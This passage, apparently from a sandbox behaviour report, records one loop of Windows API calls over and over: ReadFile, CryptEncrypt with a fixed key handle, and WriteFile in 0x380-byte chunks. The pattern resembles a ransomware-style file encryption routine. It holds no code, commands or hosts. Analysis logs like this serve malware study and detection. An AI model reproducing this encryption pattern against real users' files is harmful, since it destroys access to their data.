lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.411] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.412] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.413] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.413] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.414] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.415] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.416] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.417] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.418] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.419] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, 